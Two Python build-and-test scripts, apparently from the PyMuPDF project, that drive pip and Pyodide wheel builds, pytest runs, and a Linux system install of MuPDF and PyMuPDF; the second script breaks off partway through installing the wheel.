    args = iter(options + argv[1:])
    # First phase: consume leading `-...` options; stops at the first
    # non-option arg (a command) or end of args.
    while 1:
        try:
            arg = next(args)
        except StopIteration:
            arg = None
            break
        if not arg.startswith('-'):
            break
        elif arg == '-b':
            build_type = next(args)
        elif arg == '--build-isolation':
            build_isolation = int(next(args))
        elif arg == '-d':
            build_type = 'debug'
        elif arg == '-f':
            test_fitz = int(next(args))
        elif arg in ('-h', '--help'):
            show_help()
            return
        elif arg == '-i':
            implementations = next(args)
        elif arg in ('--mupdf', '-m'):
            mupdf = next(args)
            if not mupdf.startswith('git:') and mupdf != '-':
                assert os.path.isdir(mupdf), f'Not a directory: {mupdf=}.'
                mupdf = os.path.abspath(mupdf)
            os.environ['PYMUPDF_SETUP_MUPDF_BUILD'] = mupdf
        elif arg == '-k':
            pytest_k = next(args)
        elif arg == '-p':
            pytest_options = next(args)
        elif arg == '-s':
            value = next(args)
            assert value in ('0', '1'), f'`-s` must be followed by `0` or `1`, not {value=}.'
            os.environ['PYMUPDF_SETUP_PY_LIMITED_API'] = value
        elif arg == '--system-site-packages':
            system_site_packages = int(next(args))
        elif arg == '-t':
            test_names += next(args).split(',')
        elif arg == '--timeout':
            timeout = float(next(args))
        elif arg == '-v':
            venv = int(next(args))
        elif arg == '--build-flavour':
            build_flavour = next(args)
        elif arg == '--build-mupdf':
            build_mupdf = int(next(args))
        elif arg == '--gdb':
            gdb = int(next(args))
        elif arg == '--valgrind':
            valgrind = int(next(args))
        else:
            assert 0, f'Unrecognised option: {arg=}.'
    if arg is None:
        log(f'No command specified.')
        return
    # Second phase: remaining args must all be commands.
    commands = list()
    while 1:
        assert arg in ('build', 'buildtest', 'test', 'wheel', 'pyodide_wheel'), \
                f'Unrecognised command: {arg=}.'
        commands.append(arg)
        try:
            arg = next(args)
        except StopIteration:
            break
    venv_quick = (venv==1)
    # Run inside a venv.
    if venv and sys.prefix == sys.base_prefix:
        # We are not running in a venv.
        log(f'Re-running in venv {gh_release.venv_name!r}.')
        gh_release.venv(
                ['python'] + argv,
                quick=venv_quick,
                system_site_packages=system_site_packages,
                )
        return
    def do_build(wheel=False):
        # Build (and optionally wheel-package) PyMuPDF with collected options.
        build(
                build_type=build_type,
                build_isolation=build_isolation,
                venv_quick=venv_quick,
                build_mupdf=build_mupdf,
                build_flavour=build_flavour,
                wheel=wheel,
                )
    def do_test():
        # Run the pytest suite with collected options.
        test(
                implementations=implementations,
                valgrind=valgrind,
                venv_quick=venv_quick,
                test_names=test_names,
                pytest_options=pytest_options,
                timeout=timeout,
                gdb=gdb,
                test_fitz=test_fitz,
                pytest_k=pytest_k,
                )
    for command in commands:
        if command == 'build':
            do_build()
        elif command == 'test':
            do_test()
        elif command == 'buildtest':
            do_build()
            do_test()
        elif command == 'wheel':
            do_build(wheel=True)
        elif command == 'pyodide_wheel':
            build_pyodide_wheel()
        else:
            assert 0
def get_env_bool(name, default=0):
    '''
    Read environment variable `name` as a boolean flag.

    Returns 1 for '1'/'true', 0 for '0'/'false', `default` when the
    variable is unset; any other value is a fatal error.
    '''
    v = os.environ.get(name)
    if v is None:
        return default
    lookup = {'1': 1, 'true': 1, '0': 0, 'false': 0}
    result = lookup.get(v)
    assert result is not None, f'Bad environ {name=} {v=}'
    return result
def show_help():
    '''Print this script's usage text followed by venv/test hints.'''
    print(__doc__)
    print(venv_info())
def github_workflow_unimportant():
    '''
    Detect scheduled Github workflow runs in forks/clones.

    Returns True when GITHUB_EVENT_NAME is 'schedule' but GITHUB_REPOSITORY
    is not the main 'pymupdf/PyMuPDF' repository, so callers can bail out
    early and avoid wasting Github minutes on repositories such as
    ArtifexSoftware/PyMuPDF-julian. Returns None otherwise.
    '''
    GITHUB_EVENT_NAME = os.environ.get('GITHUB_EVENT_NAME')
    GITHUB_REPOSITORY = os.environ.get('GITHUB_REPOSITORY')
    # Guard clauses: anything other than a scheduled run in a non-main
    # repository is considered important.
    if GITHUB_EVENT_NAME != 'schedule':
        return
    if GITHUB_REPOSITORY == 'pymupdf/PyMuPDF':
        return
    log(f'## This is an unimportant Github workflow: a scheduled event, not in the main repository `pymupdf/PyMuPDF`.')
    log(f'## {GITHUB_EVENT_NAME=}.')
    log(f'## {GITHUB_REPOSITORY=}.')
    return True
def venv_info(pytest_args=None):
    '''
    Returns string containing information about the venv we use and how to
    run tests manually. If specified, `pytest_args` contains the pytest args,
    otherwise we use an example.
    '''
    pymupdf_dir_rel = gh_release.relpath(pymupdf_dir)
    ret = f'Name of venv: {gh_release.venv_name}\n'
    if pytest_args is None:
        pytest_args = f'{pymupdf_dir_rel}/tests/test_general.py::test_subset_fonts'
    # Windows venvs use `Scripts\`; POSIX venvs use `bin/`.
    if platform.system() == 'Windows':
        ret += textwrap.dedent(f'''
                Rerun tests manually with rebased implementation:
                    Enter venv:
                        {gh_release.venv_name}\\Scripts\\activate
                    Run specific test in venv:
                        {gh_release.venv_name}\\Scripts\\python -m pytest {pytest_args}
                ''')
    else:
        ret += textwrap.dedent(f'''
                Rerun tests manually with rebased implementation:
                    Enter venv and run specific test, also under gdb:
                        . {gh_release.venv_name}/bin/activate
                        python -m pytest {pytest_args}
                        gdb --args python -m pytest {pytest_args}
                    Run without explicitly entering venv, also under gdb:
                        ./{gh_release.venv_name}/bin/python -m pytest {pytest_args}
                        gdb --args ./{gh_release.venv_name}/bin/python -m pytest {pytest_args}
                ''')
    return ret
def build(
        build_type=None,
        build_isolation=None,
        venv_quick=False,
        build_mupdf=True,
        build_flavour='pb',
        wheel=False,
        ):
    '''
    Build and install (or wheel-package) PyMuPDF with pip.

    Args:
        build_type:
            See top-level option `-b`.
        build_isolation:
            See top-level option `--build-isolation`.
        venv_quick:
            See top-level option `-v`.
        build_mupdf:
            See top-level option `build-mupdf`
        build_flavour:
            See top-level option `--build-flavour`.
        wheel:
            If true we run `pip wheel` instead of `pip install`.
    '''
    print(f'{build_type=}')
    print(f'{build_isolation=}')
    if build_isolation is None:
        # On OpenBSD libclang is not available on pypi.org, so we need to force
        # use of system package py3-llvm with --no-build-isolation, manually
        # installing other required packages.
        build_isolation = False if platform.system() == 'OpenBSD' else True
    if build_isolation:
        # This is the default on non-OpenBSD.
        build_isolation_text = ''
    else:
        # Not using build isolation - i.e. pip will not be using its own clean
        # venv, so we need to explicitly install required packages. Manually
        # install required packages from pyproject.toml.
        sys.path.insert(0, os.path.abspath(f'{__file__}/../..'))
        import setup
        names = setup.get_requires_for_build_wheel()
        del sys.path[0]
        if names:
            names = ' '.join(names)
            if venv_quick:
                log(f'{venv_quick=}: Not installing packages with pip: {names}')
            else:
                gh_release.run( f'python -m pip install --upgrade {names}')
        build_isolation_text = ' --no-build-isolation'
    # Pass build configuration to setup.py via environment variables.
    env_extra = dict()
    if not build_mupdf:
        env_extra['PYMUPDF_SETUP_MUPDF_REBUILD'] = '0'
    if build_type:
        env_extra['PYMUPDF_SETUP_MUPDF_BUILD_TYPE'] = build_type
    if build_flavour:
        env_extra['PYMUPDF_SETUP_FLAVOUR'] = build_flavour
    if wheel:
        gh_release.run(f'pip wheel{build_isolation_text} -v {pymupdf_dir}', env_extra=env_extra)
    else:
        gh_release.run(f'pip install{build_isolation_text} -v {pymupdf_dir}', env_extra=env_extra)
def build_pyodide_wheel():
    '''
    Build Pyodide wheel.
    This runs `pyodide build` inside the PyMuPDF directory, which in turn runs
    setup.py in a Pyodide build environment.
    '''
    log(f'## Building Pyodide wheel.')
    # Our setup.py does not know anything about Pyodide; we set a few
    # required environmental variables here.
    #
    env_extra = dict()
    # Disable libcrypto because not available in Pyodide.
    env_extra['HAVE_LIBCRYPTO'] = 'no'
    # Tell MuPDF to build for Pyodide.
    env_extra['OS'] = 'pyodide'
    # Build a single wheel without a separate PyMuPDFb wheel.
    env_extra['PYMUPDF_SETUP_FLAVOUR'] = 'pb'
    # 2023-08-30: We set PYMUPDF_SETUP_MUPDF_BUILD_TESSERACT=0 because
    # otherwise mupdf thirdparty/tesseract/src/ccstruct/dppoint.cpp fails to
    # build because `#include "errcode.h"` finds a header inside emsdk. This is
    # pyodide bug https://github.com/pyodide/pyodide/issues/3839. It's fixed in
    # https://github.com/pyodide/pyodide/pull/3866 but the fix has not reached
    # pypi.org's pyodide-build package. E.g. currently in tag 0.23.4, but
    # current devuan pyodide-build is pyodide_build-0.23.4.
    #
    env_extra['PYMUPDF_SETUP_MUPDF_TESSERACT'] = '0'
    # Set up emsdk + pyodide venv, then build in one shell invocation.
    command = f'{pyodide_setup(pymupdf_dir)} && pyodide build --exports pyinit'
    gh_release.run(command, env_extra=env_extra)
    # Copy wheel into `wheelhouse/` so it is picked up as a workflow
    # artifact.
    #
    gh_release.run(f'ls -l {pymupdf_dir}/dist/')
    gh_release.run(f'mkdir -p {pymupdf_dir}/wheelhouse && cp -p {pymupdf_dir}/dist/* {pymupdf_dir}/wheelhouse/')
    gh_release.run(f'ls -l {pymupdf_dir}/wheelhouse/')
def pyodide_setup(directory, clean=False):
    '''
    Returns a command that will set things up for a pyodide build.
    Args:
        directory:
            Our command cd's into this directory.
        clean:
            If true we create an entirely new environment. Otherwise
            we reuse any existing emsdk repository and venv.
    * Clone emsdk repository to `emsdk` if not already present.
    * Create and activate a venv `venv_pyodide_3.11` if not already present.
    * Install/upgrade package `pyodide-build`.
    * Run emsdk install scripts and enter emsdk environment.
    * Replace emsdk/upstream/bin/wasm-opt
      (https://github.com/pyodide/pyodide/issues/4048).
    Example usage in a build function:
        command = pipcl_wasm.pyodide_setup()
        command += ' && pyodide build --exports pyinit'
        subprocess.run(command, shell=1, check=1)
    '''
    # This module does not import shutil at top level; without this local
    # import, `clean=True` raised NameError at the rmtree() calls below.
    import shutil
    command = f'cd {directory}'
    # Clone emsdk.
    #
    dir_emsdk = 'emsdk'
    if clean:
        shutil.rmtree(dir_emsdk, ignore_errors=1)
        # 2024-06-25: old `.pyodide-xbuildenv` directory was breaking build, so
        # important to remove it here.
        shutil.rmtree('.pyodide-xbuildenv', ignore_errors=1)
    if not os.path.exists(f'{directory}/{dir_emsdk}'):
        command += f' && echo "### cloning emsdk.git"'
        command += f' && git clone https://github.com/emscripten-core/emsdk.git {dir_emsdk}'
    # Create and enter Python venv.
    #
    # 2024-10-11: we only work with python-3.11; later versions fail with
    # pyodide-build==0.23.4 because `distutils` not available.
    venv_pyodide = 'venv_pyodide_3.11'
    python = sys.executable
    if sys.version_info[:2] != (3, 11):
        log(f'Forcing use of python-3.11 because {sys.version=} is not 3.11.')
        python = 'python3.11'
    if not os.path.exists( f'{directory}/{venv_pyodide}'):
        command += f' && echo "### creating venv {venv_pyodide}"'
        command += f' && {python} -m venv {venv_pyodide}'
    command += f' && . {venv_pyodide}/bin/activate'
    command += f' && echo "### running pip install ..."'
    command += f' && python -m pip install --upgrade pip wheel pyodide-build==0.23.4'
    #command += f' && python -m pip install --upgrade pip wheel pyodide-build'
    # Run emsdk install scripts and enter emsdk environment.
    #
    command += f' && cd {dir_emsdk}'
    command += ' && PYODIDE_EMSCRIPTEN_VERSION=$(pyodide config get emscripten_version)'
    command += ' && echo "### running ./emsdk install"'
    command += ' && ./emsdk install ${PYODIDE_EMSCRIPTEN_VERSION}'
    command += ' && echo "### running ./emsdk activate"'
    command += ' && ./emsdk activate ${PYODIDE_EMSCRIPTEN_VERSION}'
    command += ' && echo "### running ./emsdk_env.sh"'
    command += ' && . ./emsdk_env.sh'   # Need leading `./` otherwise weird 'Not found' error.
    if 1:
        # Make our returned command replace emsdk/upstream/bin/wasm-opt
        # with a script that does nothing, otherwise the linker
        # command fails after it has created the output file. See:
        # https://github.com/pyodide/pyodide/issues/4048
        #
        def write( text, path):
            # Write `text` to `path` and make it executable.
            with open( path, 'w') as f:
                f.write( text)
            os.chmod( path, 0o755)
        # Create a script that our command runs, that overwrites
        # `emsdk/upstream/bin/wasm-opt`, hopefully in a way that is
        # idempotent.
        #
        # The script moves the original wasm-opt to wasm-opt-0.
        #
        write(
                textwrap.dedent('''
                    #! /usr/bin/env python3
                    import os
                    p = 'upstream/bin/wasm-opt'
                    p0 = 'upstream/bin/wasm-opt-0'
                    p1 = '../wasm-opt-1'
                    if os.path.exists( p0):
                        print(f'### {__file__}: {p0!r} already exists so not overwriting from {p!r}.')
                    else:
                        s = os.stat( p)
                        assert s.st_size > 15000000, f'File smaller ({s.st_size}) than expected: {p!r}'
                        print(f'### {__file__}: Moving {p!r} -> {p0!r}.')
                        os.rename( p, p0)
                    print(f'### {__file__}: Moving {p1!r} -> {p!r}.')
                    os.rename( p1, p)
                    '''
                    ).strip(),
                f'{directory}/wasm-opt-replace.py',
                )
        # Create a wasm-opt script that basically does nothing, except
        # defers to the original script when run with `--version`.
        #
        write(
                textwrap.dedent('''
                    #!/usr/bin/env python3
                    import os
                    import sys
                    import subprocess
                    if sys.argv[1:] == ['--version']:
                        root = os.path.dirname(__file__)
                        subprocess.run(f'{root}/wasm-opt-0 --version', shell=1, check=1)
                    else:
                        print(f'{__file__}: Doing nothing. {sys.argv=}')
                    '''
                    ).strip(),
                f'{directory}/wasm-opt-1',
                )
        command += ' && ../wasm-opt-replace.py'
    command += ' && cd ..'
    return command
def test(
        implementations,
        valgrind,
        venv_quick=False,
        test_names=None,
        pytest_options=None,
        timeout=None,
        gdb=False,
        test_fitz=True,
        pytest_k=None
        ):
    '''
    Run PyMuPDF's pytest suite via tests/run_compound.py.

    Args:
        implementations:
            See top-level option `-i`.
        valgrind:
            See top-level option `--valgrind`.
        venv_quick:
            See top-level option `-v`; if true we skip installing test
            packages.
        test_names:
            See top-level option `-t`.
        pytest_options:
            See top-level option `-p`.
        timeout:
            See top-level option `--timeout`.
        gdb:
            See top-level option `--gdb`.
        test_fitz:
            See top-level option `-f`.
        pytest_k:
            See top-level option `-k`.
    '''
    pymupdf_dir_rel = gh_release.relpath(pymupdf_dir)
    if pytest_options is None:
        if valgrind:
            pytest_options = '-s -vv'
        else:
            pytest_options = ''
    if pytest_k:
        pytest_options += f' -k {shlex.quote(pytest_k)}'
    pytest_arg = ''
    if test_names:
        for test_name in test_names:
            pytest_arg += f' {pymupdf_dir_rel}/{test_name}'
    else:
        pytest_arg += f' {pymupdf_dir_rel}'
    python = gh_release.relpath(sys.executable)
    log('Running tests with tests/run_compound.py and pytest.')
    try:
        if venv_quick:
            log(f'{venv_quick=}: Not installing test packages: {gh_release.test_packages}')
        else:
            gh_release.run(f'pip install --upgrade {gh_release.test_packages}')
        run_compound_args = ''
        if implementations:
            run_compound_args += f' -i {implementations}'
        if timeout:
            run_compound_args += f' -t {timeout}'
        env_extra = None
        # Build the actual test command, depending on valgrind/gdb/platform.
        if valgrind:
            log('Installing valgrind.')
            gh_release.run(f'sudo apt update')
            gh_release.run(f'sudo apt install --upgrade valgrind')
            gh_release.run(f'valgrind --version')
            log('Running PyMuPDF tests under valgrind.')
            command = (
                    f'{python} {pymupdf_dir_rel}/tests/run_compound.py{run_compound_args}'
                    f' valgrind --suppressions={pymupdf_dir_rel}/valgrind.supp --error-exitcode=100 --errors-for-leak-kinds=none --fullpath-after='
                    f' {python} -m pytest {pytest_options}{pytest_arg}'
                    )
            env_extra=dict(
                    PYTHONMALLOC='malloc',
                    PYMUPDF_RUNNING_ON_VALGRIND='1',
                    )
        elif gdb:
            command = f'{python} {pymupdf_dir_rel}/tests/run_compound.py{run_compound_args} gdb --args {python} -m pytest {pytest_options} {pytest_arg}'
        elif platform.system() == 'Windows':
            # `python -m pytest` doesn't seem to work.
            command = f'{python} {pymupdf_dir_rel}/tests/run_compound.py{run_compound_args} pytest {pytest_options} {pytest_arg}'
        else:
            # On OpenBSD `pip install pytest` doesn't seem to install the pytest
            # command, so we use `python -m pytest ...`.
            command = f'{python} {pymupdf_dir_rel}/tests/run_compound.py{run_compound_args} {python} -m pytest {pytest_options} {pytest_arg}'
        # Always start by removing any test_*_fitz.py files.
        for p in glob.glob(f'{pymupdf_dir_rel}/tests/test_*_fitz.py'):
            print(f'Removing {p=}')
            os.remove(p)
        if test_fitz:
            # Create copies of each test file, modified to use `pymupdf`
            # instead of `fitz`.
            for p in glob.glob(f'{pymupdf_dir_rel}/tests/test_*.py'):
                if os.path.basename(p).startswith('test_fitz_'):
                    # Don't recursively generate test_fitz_fitz_foo.py,
                    # test_fitz_fitz_fitz_foo.py, ... etc.
                    continue
                branch, leaf = os.path.split(p)
                p2 = f'{branch}/{leaf[:5]}fitz_{leaf[5:]}'
                print(f'Converting {p=} to {p2=}.')
                with open(p, encoding='utf8') as f:
                    text = f.read()
                text2 = re.sub("([^\'])\\bpymupdf\\b", '\\1fitz', text)
                if p.replace(os.sep, '/') == f'{pymupdf_dir_rel}/tests/test_docs_samples.py'.replace(os.sep, '/'):
                    assert text2 == text
                else:
                    assert text2 != text, f'Unexpectedly unchanged when creating {p!r} => {p2!r}'
                with open(p2, 'w', encoding='utf8') as f:
                    f.write(text2)
        log(f'Running tests with tests/run_compound.py and pytest.')
        gh_release.run(command, env_extra=env_extra, timeout=timeout)
    except subprocess.TimeoutExpired as e:
        log(f'Timeout when running tests.')
        raise
    finally:
        log(f'\n'
                f'[As of 2024-10-10 we get warnings from pytest/Python such as:\n'
                f'    DeprecationWarning: builtin type SwigPyPacked has no __module__ attribute\n'
                f'This seems to be due to Swig\'s handling of Py_LIMITED_API.\n'
                f'For details see https://github.com/swig/swig/issues/2881.\n'
                f']'
                )
    log('\n' + venv_info(pytest_args=f'{pytest_options} {pytest_arg}'))
def get_pyproject_required(ppt=None):
    '''
    Returns the space-separated names of the packages listed in the
    `requires = [...]` line of pyproject.toml.

    This is a simple textual scan, not a TOML parse: the whole `requires`
    list must sit on a single line.
    '''
    if ppt is None:
        ppt = os.path.abspath(f'{__file__}/../../pyproject.toml')
    pattern = re.compile('^requires = \\[(.*)\\]$')
    with open(ppt) as f:
        for line in f:
            match = pattern.match(line)
            if match:
                # Turn `"a", "b"` into `a  b` by dropping commas and quotes.
                return match.group(1).replace(',', ' ').replace('"', '')
    assert 0, f'Failed to find "requires" line in {ppt}'
def wrap_get_requires_for_build_wheel(dir_):
    '''
    Returns space-separated list of required
    packages. Looks at `dir_`/pyproject.toml and calls
    `dir_`/setup.py:get_requires_for_build_wheel().
    '''
    dir_abs = os.path.abspath(dir_)
    ret = list()
    ppt = os.path.join(dir_abs, 'pyproject.toml')
    if os.path.exists(ppt):
        # get_pyproject_required() returns a single space-separated string,
        # so split it into individual names. [Previously we did
        # `ret += <string>`, which extended `ret` with the string's
        # individual characters, garbling the returned package list.]
        ret += get_pyproject_required(ppt).split()
    if os.path.exists(os.path.join(dir_abs, 'setup.py')):
        # Temporarily put `dir_` first on sys.path so `import setup` finds
        # its setup.py.
        #
        # NOTE(review): if a module called `setup` has already been imported,
        # Python will reuse the cached module instead - confirm this cannot
        # happen in practice.
        sys.path.insert(0, dir_abs)
        try:
            from setup import get_requires_for_build_wheel as foo
            for i in foo():
                ret.append(i)
        finally:
            del sys.path[0]
    return ' '.join(ret)
def log(text):
    # Thin wrapper around gh_release.log(); caller=1 makes the logged
    # location be our caller rather than this wrapper itself.
    gh_release.log(text, caller=1)
# Script entry point. Exit status is main()'s return value; failed or
# timed-out subcommands terminate with status 1 after a brief message.
if __name__ == '__main__':
    try:
        sys.exit(main(sys.argv))
    except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as e:
        # Terminate relatively quietly, failed commands will usually have
        # generated diagnostics.
        log(f'{e}')
        sys.exit(1)
    # Other exceptions should not happen, and will generate a full Python
    # backtrace etc here.
| 28,116 | Python | .py | 679 | 31.518409 | 152 | 0.581985 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,382 | sysinstall.py | pymupdf_PyMuPDF/scripts/sysinstall.py | #! /usr/bin/env python3
'''
Test for Linux system install of MuPDF and PyMuPDF.
We build and install MuPDF and PyMuPDF into a root directory, then use
scripts/test.py to run PyMuPDF's pytest tests with LD_PRELOAD_PATH and
PYTHONPATH set.
PyMuPDF itself is installed using `python -m installer` with a wheel created with
`pip wheel`.
We run install commands with `sudo` if `--root /` is used.
Note that we run some commands with sudo; it's important that these use the
same python as non-sudo, otherwise things can be build and installed for
different python versions. For example when we are run from a github action, it
should not do `- uses: actions/setup-python@v5` but instead use whatever system
python is already defined.
Args:
--mupdf-dir <mupdf_dir>
Path of MuPDF checkout; default is 'mupdf'.
--mupdf-do 0|1
Whether to build and install mupdf.
--mupdf-git <git_args>
Get or update `mupdf_dir` using git. If `mupdf_dir` already
exists we run `git pull` in it; otherwise we run `git
clone` with `<git_args> <mupdf_dir>`. For example:
--mupdf-git "--branch master https://github.com/ArtifexSoftware/mupdf.git"
--mupdf-so-mode <mode>
Used with `install -m <mode> ...` when installing MuPDF. For example
`--mupdf-so-mode 744`.
--packages 0|1
If 1 (the default) we install required system packages such as
`libfreetype-dev`.
--pip 0|venv|sudo
Whether/how to install Python packages.
If '0' we assume required packages are already available.
If 'sudo' we install required Python packages using `sudo pip install
...`.
If 'venv' (the default) we install Python packages and run installer
and test commands inside venv's.
--prefix:
Directory within `root`; default is `/usr/local`. Must start with `/`.
--pymupdf-dir <pymupdf_dir>
Path of PyMuPDF checkout; default is 'PyMuPDF'.
--pymupdf-do 0|1
Whether to build and install pymupdf.
--root <root>
Root of install directory; default is `/`.
--tesseract5 0|1
If 1 (the default), we force installation of libtesseract-dev version
5 (which is not available as a default package in Ubuntu-22.04) from
package repository ppa:alex-p/tesseract-ocr-devel.
--test-venv <test_venv>
Set the name of the venv in which we run tests (only with `--pip
venv`); the default is a hard-coded venv name. The venv will be
created, and required packages installed using `pip`.
--use-installer 0|1
If 1 (the default), we use `python -m installer` to install PyMuPDF
from a generated wheel. [Otherwise we use `pip install`, which refuses
to do a system install with `--root /`, referencing PEP-668.]
-i <implementations>
Passed through to scripts/test.py. Default is 'rR'.
-f <test-fitz>
Passed through to scripts/test.py. Default is '1'.
-p <pytest-options>
Passed through to scripts/test.py.
-t <names>
Passed through to scripts/test.py.
To only show what commands would be run, but not actually run them, specify `-m
0 -p 0 -t 0`.
'''
import glob
import multiprocessing
import os
import platform
import shlex
import subprocess
import sys
import sysconfig
import test as test_py
# Requirements for a system build and install:
#
# system packages (Debian names):
#
# Debian/Ubuntu development packages required to build MuPDF against system
# libraries (USE_SYSTEM_LIBS=yes); installed via `apt install` in main().
g_sys_packages = [
        'libfreetype-dev',
        'libgumbo-dev',
        'libharfbuzz-dev',
        'libjbig2dec-dev',
        'libjpeg-dev',
        'libleptonica-dev',
        'libopenjp2-7-dev',
        ]
# We also need libtesseract-dev version 5.
#
def main():
    '''
    Top-level driver: parses the command line, optionally clones/updates and
    builds+installs MuPDF into a root directory, builds+installs PyMuPDF
    against it, and finally runs PyMuPDF's pytest suite via scripts/test.py.
    '''
    # Diagnostics: show which python(s) we and sudo would use.
    if 1:
        print(f'## {__file__}: Starting.')
        print(f'{sys.executable=}')
        print(f'{platform.python_version()=}')
        print(f'{__file__=}')
        print(f'{sys.argv=}')
        print(f'{sysconfig.get_path("platlib")=}')
        run_command(f'python -V', check=0)
        run_command(f'python3 -V', check=0)
        run_command(f'sudo python -V', check=0)
        run_command(f'sudo python3 -V', check=0)
        run_command(f'sudo PATH={os.environ["PATH"]} python -V', check=0)
        run_command(f'sudo PATH={os.environ["PATH"]} python3 -V', check=0)
    if test_py.github_workflow_unimportant():
        return
    # Set default behaviour.
    #
    use_installer = True
    mupdf_do = True
    mupdf_dir = 'mupdf'
    mupdf_git = None
    mupdf_so_mode = None
    packages = True
    prefix = '/usr/local'
    pymupdf_do = True
    pymupdf_dir = os.path.abspath( f'{__file__}/../..')
    root = 'sysinstall_test'
    tesseract5 = True
    pytest_args = None
    pytest_do = True
    pytest_name = None
    test_venv = 'venv-pymupdf-sysinstall-test'
    pip = 'venv'
    test_fitz = '1'
    test_implementations = 'rR'
    # Parse command-line.
    #
    args = iter(sys.argv[1:])
    while 1:
        try:
            arg = next(args)
        except StopIteration:
            break
        if arg in ('-h', '--help'):
            print(__doc__)
            return
        elif arg == '--mupdf-do': mupdf_do = int(next(args))
        elif arg == '--mupdf-dir': mupdf_dir = next(args)
        elif arg == '--mupdf-git': mupdf_git = next(args)
        elif arg == '--mupdf-so-mode': mupdf_so_mode = next(args)
        elif arg == '--packages': packages = int(next(args))
        elif arg == '--prefix': prefix = next(args)
        elif arg == '--pymupdf-do': pymupdf_do = int(next(args))
        elif arg == '--pymupdf-dir': pymupdf_dir = next(args)
        elif arg == '--root': root = next(args)
        elif arg == '--tesseract5': tesseract5 = int(next(args))
        elif arg == '--pytest-do': pytest_do = int(next(args))
        elif arg == '--test-venv': test_venv = next(args)
        elif arg == '--use-installer': use_installer = int(next(args))
        elif arg == '--pip': pip = next(args)
        elif arg == '-f': test_fitz = next(args)
        elif arg == '-i': test_implementations = next(args)
        elif arg == '-p': pytest_args = next(args)
        elif arg == '-t': pytest_name = next(args)
        else:
            assert 0, f'Unrecognised arg: {arg!r}'
    assert prefix.startswith('/')
    pip_values = ('0', 'sudo', 'venv')
    assert pip in pip_values, f'Unrecognised --pip value {pip!r} should be one of: {pip_values!r}'
    root = os.path.abspath(root)
    # Collapse any double slash from joining root and prefix.
    root_prefix = f'{root}{prefix}'.replace('//', '/')
    # Only use sudo for install commands when installing into the real `/`.
    sudo = ''
    if root == '/':
        sudo = f'sudo PATH={os.environ["PATH"]} '
    def run(command):
        # MuPDF-phase commands; skipped (but printed) if --mupdf-do 0.
        return run_command(command, doit=mupdf_do)
    # Get MuPDF from git if specified.
    #
    if mupdf_git:
        # Update existing checkout or do `git clone`.
        if os.path.exists(mupdf_dir):
            print(f'## Update MuPDF checkout {mupdf_dir}.')
            run(f'cd {mupdf_dir} && git pull && git submodule update --init')
        else:
            # No existing git checkout, so do a fresh clone.
            print(f'## Clone MuPDF into {mupdf_dir}.')
            run(f'git clone --recursive --depth 1 --shallow-submodules {mupdf_git} {mupdf_dir}')
    if packages:
        # Install required system packages. We assume a Debian package system.
        #
        print('## Install system packages required by MuPDF.')
        run(f'sudo apt update')
        run(f'sudo apt install {" ".join(g_sys_packages)}')
        # Ubuntu-22.04 has freeglut3-dev, not libglut-dev.
        # NOTE(review): `|` pipes the two apt commands; `||` (try the second
        # only if the first fails) looks like the intent - confirm.
        run(f'sudo apt install libglut-dev | sudo apt install freeglut3-dev')
        if tesseract5:
            print(f'## Force installation of libtesseract-dev version 5.')
            # https://stackoverflow.com/questions/76834972/how-can-i-run-pytesseract-python-library-in-ubuntu-22-04
            #
            run('sudo apt install -y software-properties-common')
            run('sudo add-apt-repository ppa:alex-p/tesseract-ocr-devel')
            run('sudo apt update')
            run('sudo apt install -y libtesseract-dev')
        else:
            run('sudo apt install libtesseract-dev')
    # Build+install MuPDF. We use mupdf:Makefile's install-shared-python target.
    #
    if pip == 'sudo':
        print('## Installing Python packages required for building MuPDF and PyMuPDF.')
        run(f'sudo pip install --upgrade pip')
        names = test_py.wrap_get_requires_for_build_wheel(f'{__file__}/../..')
        run(f'sudo pip install {names}')
    print('## Build and install MuPDF.')
    command = f'cd {mupdf_dir}'
    command += f' && {sudo}make'
    command += f' -j {multiprocessing.cpu_count()}'
    #command += f' EXE_LDFLAGS=-Wl,--trace' # Makes linker generate diagnostics as it runs.
    command += f' DESTDIR={root}'
    command += f' HAVE_LEPTONICA=yes'
    command += f' HAVE_TESSERACT=yes'
    command += f' USE_SYSTEM_LIBS=yes'
    command += f' VENV_FLAG={"--venv" if pip == "venv" else ""}'
    if mupdf_so_mode:
        command += f' SO_INSTALL_MODE={mupdf_so_mode}'
    command += f' build_prefix=system-libs-'
    command += f' prefix={prefix}'
    command += f' verbose=yes'
    command += f' install-shared-python'
    command += f' INSTALL_MODE=755'
    run( command)
    # Build+install PyMuPDF.
    #
    print('## Build and install PyMuPDF.')
    def run(command):
        # PyMuPDF-phase commands; skipped (but printed) if --pymupdf-do 0.
        return run_command(command, doit=pymupdf_do)
    flags_freetype2 = run_command('pkg-config --cflags freetype2', capture_output=1).stdout.strip()
    compile_flags = f'-I {root_prefix}/include {flags_freetype2}'
    # NOTE(review): `link_flags` appears to be unused; LDFLAGS below is built
    # independently.
    link_flags = f'-L {root_prefix}/lib'
    env = ''
    env += f'CFLAGS="{compile_flags}" '
    env += f'CXXFLAGS="{compile_flags}" '
    env += f'LDFLAGS="-L {root}/{prefix}/lib" '
    env += f'PYMUPDF_SETUP_MUPDF_BUILD= ' # Empty => use system MuPDF.
    if use_installer:
        print(f'## Building wheel.')
        if pip == 'venv':
            venv_name = 'venv-pymupdf-sysinstall'
        run(f'pwd')
        run(f'rm dist/* || true')
        if pip == 'venv':
            run(f'{sys.executable} -m venv {venv_name}')
            run(f'. {venv_name}/bin/activate && pip install --upgrade pip')
            run(f'. {venv_name}/bin/activate && pip install --upgrade installer')
            run(f'{env} {venv_name}/bin/python -m pip wheel -vv -w dist {os.path.abspath(pymupdf_dir)}')
        elif pip == 'sudo':
            run(f'sudo pip install --upgrade pip')
            run(f'sudo pip install installer')
            run(f'{env} pip wheel -vv -w dist {os.path.abspath(pymupdf_dir)}')
        else:
            log(f'Not installing "installer" because {pip=}.')
        wheel = glob.glob(f'dist/*')
        assert len(wheel) == 1, f'{wheel=}'
        wheel = wheel[0]
        print(f'## Installing wheel using `installer`.')
        pv = '.'.join(platform.python_version_tuple()[:2])
        p = f'{root_prefix}/lib/python{pv}'
        # `python -m installer` fails to overwrite existing files.
        run(f'{sudo}rm -r {p}/site-packages/pymupdf || true')
        run(f'{sudo}rm -r {p}/site-packages/pymupdf.py || true')
        run(f'{sudo}rm -r {p}/site-packages/fitz || true')
        run(f'{sudo}rm -r {p}/site-packages/fitz.py || true')
